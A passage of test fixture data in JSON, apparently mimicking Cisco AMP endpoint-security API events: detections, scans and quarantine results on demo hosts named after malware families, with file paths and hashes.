Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663665717641217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827054281638806000,"timestamp":1610704800,"timestamp_nanoseconds":664000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1335,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265790660805000,"timestamp":1610704800,"timestamp_nanoseconds":44000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614900658962000,"timestamp":1610704800,"timestamp_nanoseconds":406000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707183856779000,"timestamp":1610704800,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363037310321000,"timestamp":1610704800,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":189474725,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 